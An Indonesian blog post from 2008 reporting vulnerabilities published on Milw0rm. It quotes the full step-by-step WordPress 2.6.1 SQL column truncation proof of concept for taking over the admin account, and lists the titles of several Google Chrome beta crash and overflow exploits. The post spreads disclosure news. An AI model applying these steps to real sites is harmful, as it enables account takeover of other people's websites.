Baru kemaren mendapatkan informasi tentang bugs Google Chrome. Hari ini mas Tono memberikan Informasi lagi mengenai WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC), yang dia dapatkan dari rss Milw0rm, memang agak telat informasi ini setidaknya baru sehari yang lalu informasi ini di publikasikan di Milw0rm.

Isi dari informasi tersebut adalah adanya celah yang bisa mengganti  password admin. Jika Form Registrasi pada Wordpress Enable atau diaktifkan. Berikut ini adalah cara yang didapatkan oleh “mereka” untuk mengganti password admin :

1. go to url: server.com/wp-login.php?action=register
2. register as:
login: admin[55 space chars]x
email: your email
now, we have duplicated 'admin' account in database
3. go to url: server.com/wp-login.php?action=lostpassword
4. write your email into field and submit this form
5. check your email and go to reset confirmation link
6. admin's password changed, but new password will
   be send to correct admin email
# milw0rm.com [2008-09-07]

Blog yang pertama kali  membuat artikel tentang ini bisa anda lihat disini.

Baru beberapa hari launching Google Chrome Browser Versi Beta (Google Menggila!!), tepatnya pada 02 September 2008, Bug (Exploit or Crash) dari Browser yang baru lahir ini pun bermunculan. Hari ini Saya baru mendapatkan informasi ini dari seorang teman saya yaitu mas tono yang hobi men-subscribe rss dari Milw0rm. Yang katanya sudah ada buktinya dari seseorang temanya di malang. Adapaun Exploit dan Crash yang ada dapat teman-teman dapatkan pada Milw0rm, berikut ini beberapa list yang saya dapatkan dari Milw0rm tersebut :

1. Google Chrome Browser 0.2.149.27 (SaveAs) Remote BOF Exploit
2. Google Chrome Browser 0.2.149.27 Inspect Element DoS Exploit
3. Google Chrome Browser 0.2.149.27 A HREF Denial of Service Exploit
4. Google Chrome Browser 0.2.149.27 (1583) Remote Silent Crash PoC
5. Google Chrome Browser 0.2.149.27 malicious link DoS Vulnerability

Terimakasih atas mas tono atas informasinya yang sangat bermanfaat dan mungkin bermanfaat bagi teman-teman yang lain.Selamat Berbuka Puasa Untuk Teman-teman.